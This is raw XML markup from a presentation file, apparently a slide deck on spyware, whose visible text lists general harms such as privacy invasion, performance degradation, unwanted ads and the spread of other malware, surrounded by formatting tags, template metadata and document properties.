          </a:p>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Increase in system crashes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="38100" indent="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzPct val="200000"/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="24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Damages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4"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152400" y="1113790"/>
            <a:ext cx="11903075" cy="62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3600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="15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微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t>Spyware can cause a number of negative impacts, including:</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sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Box 8" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030362c5c2274656d706c61746549645c223a32303233313234337d220a7d0a"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="544830" y="1678940"/>
            <a:ext cx="11240135" cy="4579620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:no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Privacy invasion:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Spyware can gather sensitive information, such as login credentials, financial information, and personal data, and transmit it to attackers. This can result in identity theft, financial losses, and a loss of privacy.</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Performance degradation:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Spyware can slow down a computer's performance, as it can consume system resources and interfere with normal system operations.</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Unwanted ads:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Spyware can display unwanted ads, pop-ups, and other unwanted content, which can be distracting and annoying to users.</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Spread of malware:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Spyware can be used to spread other types of malware, such as viruses and Trojans, to other systems.</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Increased risk of cybercrime:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203" charset="-122"/>
              </a:rPr>
              <a:t> Spyware can be used by attackers to carry out other types of cybercrime, such as phishing scams and identity theft.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2300" b="0" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:sym typeface="微软雅黑 Light" panose="020B0502040204020203"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
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="5"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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7679_5*l_h_i*1_2_1"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227679"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="6"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE"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27679_5*l_h_i*1_2_3"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227679"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_FILL_FORE_SCHEMECOLOR_INDEX" val="6"/>
  <p:tag name="KSO_WM_UNIT_FILL_TYPE" val="1"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE"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27679_5*l_h_i*1_2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27679_5*l_h_i*1_2_2"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227679"/>
  <p:tag name="KSO_WM_UNIT_LAYERLEVEL" val="1_1_1"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val=""/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="6"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_FORE_SCHEMECOLOR_INDEX" val="5"/>
  <p:tag name="KSO_WM_UNIT_TEXT_FILL_TYPE" val="1"/>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i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="mixed20201941_294*i*1"/>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02.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i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_ID" val="mixed20201941_294*i*2"/>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i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="1"/>
  <p:tag name="KSO_WM_UNIT_ID" val="mixed20201941_294*i*1"/>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23.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i"/>
  <p:tag name="KSO_WM_UNIT_INDEX" val="2"/>
  <p:tag name="KSO_WM_UNIT_ID" val="mixed20201941_294*i*2"/>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SPECIAL_SOURCE" val="bdnull"/>
  <p:tag name="KSO_WM_SLIDE_ID" val="diagram20227964_3"/>
  <p:tag name="KSO_WM_TEMPLATE_SUBCATEGORY" val="0"/>
  <p:tag name="KSO_WM_TEMPLATE_MASTER_TYPE" val="1"/>
  <p:tag name="KSO_WM_TEMPLATE_COLOR_TYPE" val="0"/>
  <p:tag name="KSO_WM_SLIDE_INDEX" val="3"/>
  <p:tag name="KSO_WM_TAG_VERSION" val="1.0"/>
  <p:tag name="KSO_WM_BEAUTIFY_FLAG" val="#wm#"/>
  <p:tag name="KSO_WM_TEMPLATE_CATEGORY" val="diagram"/>
  <p:tag name="KSO_WM_TEMPLATE_INDEX" val="20227964"/>
  <p:tag name="KSO_WM_SLIDE_TYPE" val="text"/>
  <p:tag name="KSO_WM_SLIDE_SUBTYPE" val="diag"/>
  <p:tag name="KSO_WM_SLIDE_ITEM_CNT" val="3"/>
  <p:tag name="KSO_WM_SLIDE_SIZE" val="913.55*403"/>
  <p:tag name="KSO_WM_SLIDE_POSITION" val="0*66.25"/>
  <p:tag name="KSO_WM_DIAGRAM_GROUP_CODE" val="l1-1"/>
  <p:tag name="KSO_WM_SLIDE_DIAGTYPE" val="l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT" val="l"/>
  <p:tag name="KSO_WM_SLIDE_LAYOUT_CNT" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag343.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="COMMONDATA" val="eyJoZGlkIjoiMmY5MzdhMTM4MGYwZjY3MmUyNDAwYWI5ODI4MjA4MzUifQ=="/>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1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2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4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2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2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2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2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29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30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3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3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3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3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3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3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3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3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10631</Words>
  <Application>WPS Writer</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>208</Paragraphs>
  <Slides>24</Slides>
  <Notes>11</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>0</MMClips>
  <ScaleCrop>false</ScaleCrop>
  <HeadingPairs>
    <vt:vector size="6" baseType="variant">
      <vt:variant>
        <vt:lpstr>已用的字体</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>27</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>主题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>47</vt:i4>
      </vt:variant>
      <vt:variant>
        <vt:lpstr>幻灯片标题</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>24</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="98" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>SimSun</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>阿里巴巴普惠体 R</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>华文楷体</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Palatino Linotype</vt:lpstr>
      <vt:lpstr>苹方-简</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>汉仪旗黑</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>微软雅黑 Light</vt:lpstr>
      <vt:lpstr>思源黑体 CN Bold</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>黑体-简</vt:lpstr>
      <vt:lpstr>Lucida Sans</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>思源黑体 CN Heavy</vt:lpstr>
      <vt:lpstr>思源黑体 CN Normal</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>宋体-简</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>135_自定义设计方案</vt:lpstr>
      <vt:lpstr>143_自定义设计方案</vt:lpstr>
      <vt:lpstr>134_自定义设计方案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13_自定义设计方案</vt:lpstr>
      <vt:lpstr>14_自定义设计方案</vt:lpstr>
      <vt:lpstr>15_自定义设计方案</vt:lpstr>
      <vt:lpstr>16_自定义设计方案</vt:lpstr>
      <vt:lpstr>17_自定义设计方案</vt:lpstr>
      <vt:lpstr>18_自定义设计方案</vt:lpstr>
      <vt:lpstr>19_自定义设计方案</vt:lpstr>
      <vt:lpstr>20_自定义设计方案</vt:lpstr>
      <vt:lpstr>21_自定义设计方案</vt:lpstr>
      <vt:lpstr>22_自定义设计方案</vt:lpstr>
      <vt:lpstr>1_Office 主题</vt:lpstr>
      <vt:lpstr>23_自定义设计方案</vt:lpstr>
      <vt:lpstr>24_自定义设计方案</vt:lpstr>
      <vt:lpstr>25_自定义设计方案</vt:lpstr>
      <vt:lpstr>26_自定义设计方案</vt:lpstr>
      <vt:lpstr>27_自定义设计方案</vt:lpstr>
      <vt:lpstr>28_自定义设计方案</vt:lpstr>
      <vt:lpstr>29_自定义设计方案</vt:lpstr>
      <vt:lpstr>30_自定义设计方案</vt:lpstr>
      <vt:lpstr>31_自定义设计方案</vt:lpstr>
      <vt:lpstr>32_自定义设计方案</vt:lpstr>
      <vt:lpstr>33_自定义设计方案</vt:lpstr>
      <vt:lpstr>34_自定义设计方案</vt:lpstr>
      <vt:lpstr>35_自定义设计方案</vt:lpstr>
      <vt:lpstr>36_自定义设计方案</vt:lpstr>
      <vt:lpstr>37_自定义设计方案</vt:lpstr>
      <vt:lpstr>2_Office 主题</vt:lpstr>
      <vt:lpstr>3_Office 主题</vt:lpstr>
      <vt:lpstr>4_Office 主题</vt:lpstr>
      <vt:lpstr>6_Office 主题</vt:lpstr>
      <vt:lpstr>38_自定义设计方案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Liping</dc:creator>
  <cp:lastModifiedBy>Fangtian Zhong</cp:lastModifiedBy>
  <cp:revision>121</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-05T13:54:57Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-05T13:54:57Z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A1378116E481472FA6251A948E06C9AB_12</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>1033-4.9.0.7859</vt:lpwstr>
  </property>
</Properties>
</file>